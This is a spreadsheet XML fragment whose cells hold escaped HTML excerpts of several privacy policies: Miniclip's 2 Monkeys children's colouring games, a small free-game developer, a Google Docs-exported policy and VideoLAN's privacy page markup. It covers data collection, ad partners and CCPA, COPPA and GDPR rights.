    <t xml:space="preserve">If you have any questions about our data practices, your rights or have any concerns or complaints, you can contact us at &lt;a href="/cdn-cgi/l/email-protection#0861666e67483a25656766636d717b266664"&gt;&lt;span class="__cf_email__" data-cfemail="90f9fef6ffd0a2bdfdfffefbf5e9e3befefc"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, or send a letter to the address provided in the &lt;a href="#adress"&gt; Privacy Policy &lt;/a&gt;. We will respond within 1 month.&lt;/p&gt;
&lt;/br&gt;
&lt;p&gt;
 Our games include but are not limited to:
&lt;br&gt;&lt;br&gt;
 - Cars  (com.color.cars)&lt;/br&gt;
 - Christmas Coloring  (com.coloring.christmas)&lt;/br&gt;
 - Coloring Book: ColorMaster  (com.coloring.book)&lt;/br&gt;
 - Coloring book  (com.coloring.kids)&lt;/br&gt;
 - Coloring for girls and women  (com.coloring.girls)&lt;/br&gt;
 - Dino Coloring Game  (com.coloring.dinosaur)&lt;/br&gt;
 - Dolphins coloring pages  (com.coloring.fishdolphins)&lt;/br&gt;
 - Football coloring book game  (com.coloring.football)&lt;/br&gt;
 - Halloween  (com.coloring.halloween)&lt;/br&gt;
 - Horse coloring pages game  (com.coloring.horse)&lt;/br&gt;
 - Jigsaw Puzzle Game  (com.puzzlemaster.jigsaw)&lt;/br&gt;
 - Mandala Coloring Pages  (com.color.mandala)&lt;/br&gt;
 - Manga Coloring Book  (com.coloring.manga)&lt;/br&gt;
 - Mermaids  (com.coloring.mermaids)&lt;/br&gt;
 - Painting and drawing for Girls  (com.coloring.girlsfree)&lt;/br&gt;
 - Painting and drawing game  (com.coloring.toddlers)&lt;/br&gt;
 - Princess Coloring Game  (com.princess.coloring)&lt;/br&gt;
 - Train game: coloring book.  </t>
  </si>
  <si>
    <t>We will only collect data, in these apps when it is needed to provide the service and ensure that they are protected in accordance with the applicable privacy laws. &lt;br /&gt; &lt;br /&gt; If you are a parent or legal guardian of a child under the age of 13 (or under 16 in certain jurisdictions in the European Union) who uses a child directed Game, please contact us at &lt;a href="/cdn-cgi/l/email-protection#9ef7f0f8f1deacb3d3f1f0f5fbe7edb0f0f2"&gt;&lt;span class="__cf_email__" data-cfemail="9ef7f0f8f1deacb3d3f1f0f5fbe7edb0f0f2"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, if you have any questions or comments.</t>
  </si>
  <si>
    <t>For Brazilian residents, please &lt;a href="#brazil"&gt; refer to Addendum 2 - Brazil Privacy Rights &lt;/a&gt; . For EEA and Switzerland based, you will find more information below on when which rights can apply.&lt;/p&gt;
&lt;p&gt;To exercise your rights, please email us at &lt;u&gt; &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="a3cacdc5cce3918eeecccdc8c6dad08dcdcf"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/u&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Access&lt;/strong&gt; . You have the right to access Information, and to receive an explanation of how we use it and who we share it with.</t>
  </si>
  <si>
    <t>CONTACT &amp;amp; COMPLAINTS&lt;/h3&gt;
&lt;p&gt;We welcome questions, comments and requests regarding this Policy. These should be addressed to &lt;a href="/cdn-cgi/l/email-protection#a6cfc8c0c9e6948bebc9c8cdc3dfd588c8ca"&gt;&lt;span class="__cf_email__" data-cfemail="1970777f76592b34547677727c606a377775"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;. You can also send a letter to 2 Monkeys Data Protection c/o Miniclip SA, Faubourg de l'H&amp;ocirc;pital 18, 2000 Neuch&amp;acirc;tel, Switzerland.</t>
  </si>
  <si>
    <t>Alternatively, if you are based in the EEA, you can send a letter to 2Monkeys Data protection c/o Miniclip (UK) Limited at Legal Department at Miniclip, Holborn Gate, 326-330 High Holborn, London WC1V 7PP.&lt;/p&gt;
&lt;p&gt;If you wish to make a complaint about how we process your Information, please contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="6e070008012e5c43230100050b171d400002"&gt;[email&amp;#160;protected]&lt;/a&gt; and we will endeavour to deal with your complaint as soon as possible. This is without prejudice to your right to launch a claim with a data protection authority.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;8.</t>
  </si>
  <si>
    <t>CHANGES&lt;/h3&gt;
&lt;p&gt;Any updates or changes to this Policy will be published here. If there are any significant changes, we will notify you through the website and in-Game.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;a id="adpartners"&gt;&lt;/a&gt;
&lt;h3&gt;ADVERTISING AND USER ACQUISITION PARTNERS&lt;/h3&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt; We use the following advertising partners, that are integrated into some or all the Games.</t>
  </si>
  <si>
    <t xml:space="preserve">Please check the following privacy policies to learn more about their privacy practices, including how you may exercise your data subject rights.&lt;/p&gt;
&lt;p&gt; This list was last updated on 29 September 2022&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;table border="1" width="979" cellspacing="0" cellpadding="0"&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p align="center"&gt;&lt;strong&gt;Advertising partner&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
 &lt;td&gt;
&lt;p align="center"&gt;&lt;strong&gt;Link to Privacy Policy&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
</t>
  </si>
  <si>
    <t>&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;AdMob (Google)&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://policies.google.com/technologies/partner-sites?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://policies.google.com/technologies/partner-sites &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Applovin&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://www.applovin.com/privacy/" target="_blank" rel="noopener"&gt;https://www.applovin.com/privacy/&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Inmobi&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://www.inmobi.com /privacy-policy" target="_blank" rel="noopener"&gt;https://www.inmobi.com/privacy-policy&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;ironSource&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://developers.ironsrc.com/ironsource-mobile/air/ironsource-mobile-privacy-policy/ &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;p&gt;Unity Ads&lt;/p&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;p&gt;&lt;a href="https://unity3d.com/legal/privacy-policy?mcOpenExternal=true" target="_blank" rel="noopener"&gt; https://unity3d.com/legal/privacy-policy &lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;div&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;a id="cppa"&gt;&lt;/a&gt;ADDENDUM 1 - CALIFORNIA PRIVACY RIGHTS&lt;/h3&gt;
&lt;p&gt;The terms of this Addendum apply to residents of California under the California Consumer Privacy Act of 2018 (California Civil Code &amp;sect;&amp;sect; 1798.100 to 1798.199) and its implementing regulations, as amended or superseded from time to time ("CCPA").</t>
  </si>
  <si>
    <t>For the purposes of this addendum, Personal Information means information that identifies, relates to, describes, is reasonably capable of being associated with, or could reasonably be linked, directly or indirectly, with a particular consumer or household, or as otherwise defined by the CCPA. Personal Information does not include information that is: lawfully made available from government records, deidentified or aggregated, or otherwise excluded from the scope of the CCPA.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Collection and Disclosure of Personal Information&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Over the past 12 months, through your use of the Games, we may have collected and disclosed the following categories of Personal Information from or about you:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;Identifiers, including IP address, device identifiers and advertising ID. This information is collected directly from you or your device.&lt;/li&gt;
&lt;li&gt;Internet or other electronic network activity information, including your use of in-game features and events and information on your in-game activity, and information on your interactions with advertising shown in on our Games.</t>
  </si>
  <si>
    <t>This information is collected from our selected third party analytics providers and advertising partners.&lt;/li&gt;
&lt;li&gt;Geolocation data, including city level location data. This information is collected directly from you or your device and from third party services when you register through them.&lt;/li&gt;
&lt;li&gt;Commercial information, including records of products or services purchased, obtained, or considered, your Apple ID number for Apple, your postcode and state for Google. This information is collected directly from you or your device, and from our payment processors.&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;In the preceding twelve months, we have collected Personal Information from the following categories of sources:&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;p&gt;1.</t>
  </si>
  <si>
    <t>You/Your Devices directly.&lt;/p&gt;
&lt;p</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;_x005F_x000D_
&lt;html&gt;_x005F_x000D_
&lt;head&gt;_x005F_x000D_
  &lt;meta charset='utf-8'&gt;_x005F_x000D_
  &lt;meta name='viewport' content='width=device-width'&gt;_x005F_x000D_
  &lt;title&gt;Privacy Policy&lt;/title&gt;_x005F_x000D_
  &lt;style&gt;_x005F_x000D_
    body {_x005F_x000D_
      font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", Helvetica, Arial, "Lucida Grande", sans-serif; _x005F_x000D_
      font-style: normal;_x005F_x000D_
      font-size: 15px;_x005F_x000D_
      background: #e6edf2;_x005F_x000D_
      color: #425968;_x005F_x000D_
    }_x005F_x000D_
    _x005F_x000D_
    .main-block {_x005F_x000D_
      position: relative;_x005F_x000D_
      background: #FFFFFF;_x005F_x000D_
      box-shadow: 0px 0px 5px rgba(0, 0, 0, 0.15);_x005F_x000D_
      border-radius: 10px;_x005F_x000D_
      padding: 30px;_x005F_x000D_
      margin: 20px;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    .main-block-title {_x005F_x000D_
      font-size: 22px;_x005F_x000D_
      padding-bottom: 10px;_x005F_x000D_
    }_x005F_x000D_
        _ x000D_
    a {_x005F_x000D_
      color: #07C;_x005F_x000D_
      text-decoration: none;_x005F_x000D_
      cursor: pointer;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
    a:hover {_x005F_x000D_
      text-decoration: underline;_x005F_x000D_
    }_x005F_x000D_
_x005F_x000D_
  &lt;/style&gt;_x005F_x000D_
&lt;/head&gt;_x005F_x000D_
&lt;body&gt;_x005F_x000D_
_x005F_x000D_
  &lt;div class="main-block"&gt;_x005F_x000D_
    &lt;div class="main-block-title"&gt;Privacy Policy&lt;/div&gt;_x005F_x000D_
_x005F_x000D_
 This game is built sa a Free app.</t>
  </si>
  <si>
    <t xml:space="preserve">This page is used to inform visitors regarding my policies with the collection, use, and disclosure of Personal Information if anyone decided to use my Service._x005F_x000D_
&lt;br&gt;_x005F_x000D_
If you choose to play this game, then you agree to the collection and use of information in relation to this policy. The Personal Information that I collect is used for providing and improving the Service. I will not use or share your information with anyone except as described in this Privacy Policy._x005F_x000D_
&lt;br&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t>The terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, which is accessible at game unless otherwise defined in this Privacy Policy._x005F_x000D_
&lt;br&gt;&lt;br&gt;_x005F_x000D_
&lt;b&gt;Information Collection and Use&lt;/b&gt;_x005F_x000D_
&lt;br&gt;_x005F_x000D_
For a better experience, while using our Service, I may require you to provide us with certain personally identifiable information. The information that I request will be retained on your device and is not collected by me in any way._x005F_x000D_
&lt;br&gt;_x005F_x000D_
 The app does use third party services that may collect information used to identify you._x005F_x000D_
&lt;br&gt;_x005F_x000D_
Third party services used by the app:_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;&lt;a href="https://unity.com/ru/solutions/unity-ads" target="_blank"&gt;Unity Ads&lt;/a&gt; - used to show the video Ads.&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;&lt;a href="https://www.is.com"</t>
  </si>
  <si>
    <t>target="_blank"&gt;IronSource&lt;/a&gt; - used to show the video Ads.&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;&lt;a href="https://support.google.com/admob/answer/6128543" target="_blank"&gt;AdMob&lt;/a&gt; - used to show the video Ads.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
Analytics servises used in game temporary. It needed to make game better and clear for new players.&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
&lt;b&gt;Service Providers&lt;/b&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
I may employ third-party companies and individuals due to the following reasons:&lt;br&gt;_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
    &lt;li&gt;To facilitate our Service;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;To provide the Service on our behalf;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;To perform Service-related services;&lt;/li&gt;_x005F_x000D_
    &lt;li&gt;To assist us in analyzing how our Service is used.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
I want to inform users of this Service that these third parties have access to your Personal Information. The reason is to perform the tasks assigned to them on our behalf.</t>
  </si>
  <si>
    <t xml:space="preserve">However, they are obligated not to disclose or use the information for any other purpose.&lt;br&gt;_x005F_x000D_
&lt;br&gt;_x005F_x000D_
&lt;b&gt;Security&lt;/b&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
 I value your trust in providing us your Personal Information, thus we are striving to use commercially acceptable means of protecting it. But remember that no method of transmission over the internet, or method of electronic storage is 100% secure and reliable, and I cannot guarantee its absolute security.&lt;br&gt;_x005F_x000D_
&lt;br&gt;_x005F_x000D_
&lt;b&gt;Children’s Privacy&lt;/b&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>These Services do not address anyone under the age of 13. I do not knowingly collect personally identifiable information from children under 13. In the case I discover that a child under 13 has provided me with personal information, I immediately delete this from our servers.</t>
  </si>
  <si>
    <t xml:space="preserve">If you are a parent or guardian and you are aware that your child has provided us with personal information, please contact me so that I will be able to do necessary actions.&lt;br&gt;_x005F_x000D_
&lt;br&gt;_x005F_x000D_
&lt;b&gt;Changes to This Privacy Policy&lt;/b&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
I may update our Privacy Policy from time to time. Thus, you are advised to review this page periodically for any changes. I will notify you of any changes by posting the new Privacy Policy on this page.&lt;br&gt;_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">This policy is effective as of 2022-02-10&lt;br&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
&lt;b&gt;Contact Us&lt;/b&gt;&lt;br&gt;_x005F_x000D_
_x005F_x000D_
If you have any questions or suggestions about my Privacy Policy, do not hesitate to contact me at &lt;a mail="patlatik@gmail.com"&gt;patlatik@gmail.com&lt;/a&gt;.&lt;br&gt;_x005F_x000D_
  &lt;/div&gt;_x005F_x000D_
  &lt;br&gt;_x005F_x000D_
  &lt;center&gt;&lt;a href="http://rud.mygamesonline.org/" target="_blank"&gt;RUD present&lt;/a&gt; - 2018&lt;/center&gt;&lt;br&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
  </t>
  </si>
  <si>
    <t>class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy is drafted with adherence to the applicable privacy protection laws, including following legislation:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;):&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c28 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode%3DCIV%26division%3D3.%26title%3D1.81.5.%26part%3D4.%26chapter%3D%26article%3D&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1GX84Nj_uTAVhP_iQVrCQl"&gt;http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode=CIV&amp;amp;division=3.&amp;amp;title=1.81.5.&amp;amp;part=4.&amp;amp;chapter=&amp;amp;article=&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="2"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Children&amp;#39;s Online Privacy Protection Rule (&amp;quot;COPPA&amp;quot;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c22 c28"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://uscode.house.gov/view.xhtml?path%3D/prelim@title15/chapter91%26edition%3Dprelim&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1ibRjxFnA98UgMN4qnvOD0"&gt;https://uscode.house.gov/view.xhtml?path=/&lt;span class="__cf_email__" data-cfemail="166664737a7f7b56627f627a732723"&gt;[email&amp;#160;protected]&lt;/span&gt;/chapter91&amp;amp;edition=prelim&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="3"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation or &amp;ldquo;GDPR&amp;rdquo;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://eur-lex.europa.eu/eli/reg/2016/679/oj&amp;amp;sa=D&amp;amp;ust=1607602738196000&amp;amp;usg=AOvVaw0TkrFZDgyzmJSErWWHEgXD"&gt;https://eur-lex.europa.eu/eli/reg/2016/679/oj&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c12"&gt;&lt;span</t>
  </si>
  <si>
    <t xml:space="preserve">    &lt;!DOCTYPE html&gt;
    &lt;html lang="en" &gt;
    &lt;head&gt;
        &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
        &lt;meta name="Author" content="VideoLAN" /&gt;
        &lt;meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, media converter, video, video player,
        multimedia, multicast, x262, x264, x265, DVBlast, Windows, Linux, Unix, BeOS, BSD, MacOS, MacOS X, OSX, Android, Streaming,
        DVD, Matroska, Blu-Ray, FLV, Xvid, MPEG, MPEG2, MPEG4, H264, DivX, MKV, m2ts, open source, free software, floss, free" /&gt;
        &lt;meta name="Description" content="Legal Privacy" /&gt;
        &lt;meta name="apple-itunes-app" content="app-id=650377962"/&gt;
        &lt;title&gt;Legal Privacy - VideoLAN&lt;/title&gt;
                &lt;link rel="shortcut icon" type="image/x-icon" href="//images.videolan.org/images/favicon.ico" /&gt;
                &lt;link rel="alternate" type="application/rss+xml" title="RSS - VideoLAN News" href="//images.videolan.org/videolan-news.rss" /&gt;
        &lt;link rel="alternate" type="application/rss+xml" title="RSS - Developers Blog" href="//planet.videolan.org/rss20.xml" /&gt;
        &lt;!-- vlc/privacy --&gt;
        &lt;link rel="stylesheet" type="text/css" href="//images.videolan.org/style/bootstrap.min.css" /&gt;
        &lt;link rel="stylesheet" type="text/css" href="//images.videolan.org/style/style.min.css" /&gt;
                &lt;link rel="dns-prefetch" href="//get.videolan.org" /&gt;
        &lt;!--[if lt IE 9]&gt;
            &lt;script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"&gt;&lt;/script&gt;
            &lt;script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"&gt;&lt;/script&gt;
        &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
        &lt;!--[if lte IE 7]&gt;
            * {
                behavior: url("/style/box-sizing.htc");
            }
        &lt;! [endif]--&gt;
        &lt;!--[if</t>
  </si>
  <si>
    <t>lt IE 7]&gt;
           &lt;style type="text/css"&gt;
              @media screen{ body{behavior:url("/width.htc");} }
                /* PNG support for IE */
                img {  behavior: url("/png.htc");}
                .DXImageTransformed { display: inline-block; }
              &lt;/style&gt;
        &lt;! [endif]--&gt;
                        &lt;script src="//images.videolan.org/js/jquery.min.js" type='text/javascript'&gt;&lt;/script&gt;
        &lt;script async="async" src="//images.videolan.org/js/bootstrap.min.js" type="text/javascript"&gt;&lt;/script&gt;
                &lt;script type="text/javascript"&gt;
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
            (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
            m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
            })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
            ga('create', 'UA-38853043-1', 'auto');
            ga('set', 'anonymizeIp', true);
            ga('send', 'pageview');
            function isTouchDevice() {
                return 'ontouchstart' in window || navigator.maxTouchPoints;
            };
            $(document).ready(function() {
                //Early return if touch device
                if (isTouchDevice()) {
                    return;
                }
                //Open dropdown menu on hover if not touch device &amp; navbar-toggle not visible
                $('#nav ul.nav li.dropdown').hover(function() {
                    if (!$('.navbar-toggle').is(':visible') &amp;&amp; !$(this).hasClass('open')) {
                        $('.dropdown-toggle', this).trigger('click');
                    }
                }, function() {
                    if (!$('.navbar-toggle').is(':visible') &amp;&amp; $(this).hasClass('open'))</t>
  </si>
  <si>
    <t>{
                        $('.dropdown-toggle', this).trigger('click');
                    }
                });
            });
        &lt;/script&gt;
    &lt;/head&gt;
&lt;body class=''&gt;&lt;div id='bodyInner' class='green'&gt;    &lt;nav id="nav" class="navbar navbar-default navbar-fixed-top"&gt;
 &lt;div class="container"&gt;
    &lt;div class="navbar-header"&gt;
        &lt;a class="navbar-brand" href="//www.videolan.org/"&gt;
        &lt;img src='//images.videolan.org/images/logoGreen.png' alt='VideoLAN association' /&gt;
        &lt;/a&gt;
        &lt;button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#main-navbar" aria-expanded="false"&gt;
            &lt;span class="sr-only"&gt;Toggle navigation&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
            &lt;span class="icon-bar"&gt;&lt;/span&gt;
        &lt;/button&gt;
    &lt;/div&gt;
    &lt;div id="main-navbar" class="navbar-collapse collapse"&gt;
      &lt;ul class="nav navbar-nav"&gt;
        &lt;li class="dropdown "&gt;
          &lt;a href="//www.videolan.org/videolan/" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"&gt;VideoLAN &lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
          &lt;ul class="dropdown-menu"&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/videolan/"&gt;Team &amp;amp; Organization&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/videolan/partners.html"&gt;Consulting Services &amp;amp; Partners&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/videolan/events/"&gt;Events&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/legal.html"&gt;Legal&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/press/"&gt;Press center&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/contact.html"&gt;Contact us&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        &lt;/li&gt;
        &lt;li class="dropdown  active "&gt;
          &lt;a href="//www.videolan.org/vlc/" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"&gt;VLC &lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
          &lt;ul class="dropdown-menu"&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/vlc/"&gt;Download&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/vlc/features.html"&gt;Features&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/vlc/skins.html"&gt;Customize&lt;/a&gt;&lt;/li&gt;
            &lt;li role="separator" class="divider"&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/goodies.html"&gt;Get Goodies&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        &lt;/li&gt;
        &lt;li class="dropdown "&gt;
          &lt;a href="//www.videolan.org/projects/" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"&gt;Projects &lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
          &lt;ul class="dropdown-menu"&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/projects/dvblast.html"&gt;DVBlast&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/x264.html"&gt;x264&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/x262.html"&gt;x262&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/x265.html"&gt;x265&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/projects/multicat.html"&gt;multicat&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/projects/dav1d.html"&gt;dav1d&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/vlc/skineditor.html"&gt;VLC Skin Editor&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t xml:space="preserve">href="//www.videolan.org/vlc/"&gt;VLC media player&lt;/a&gt;&lt;/li&gt;
            &lt;li role="separator" class="divider"&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/vlc/libvlc.html"&gt;libVLC&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdcss.html"&gt;libdvdcss&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdnav.html"&gt;libdvdnav&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdnav.html"&gt;libdvdread&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libbluray.html"&gt;libbluray&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvbpsi.html"&gt;libdvbpsi&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libaacs.html"&gt;libaacs&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvbcsa.html"&gt;libdvbcsa&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/bitstream.html"&gt;biTStream&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/developers/unity.html"&gt;vlc-unity&lt;/a&gt;&lt;/li&gt;
            &lt;li role="separator" class="divider"&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/projects/"&gt;All Projects&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        &lt;/li&gt;
        &lt;li class="dropdown "&gt;
          &lt;a href="//www.videolan.org/contribute.html" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"&gt;Contribute &lt;span class="caret"&gt;&lt;/span&gt;&lt;/a&gt;
          &lt;ul class="dropdown-menu"&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/contribute.html"&gt;Getting started&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/contribute.html#money"&gt;Donate&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href="//www.videolan.org/support/#bugs"&gt;Report a bug&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        &lt;/li&gt;
        &lt;li&gt;
          &lt;a href="//www.videolan.org/support/"&gt;Support&lt;/a&gt;
        &lt;/li&gt;
      &lt;/ul&gt;
               </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;ul class="nav navbar-nav pull-right donate-box"&gt;
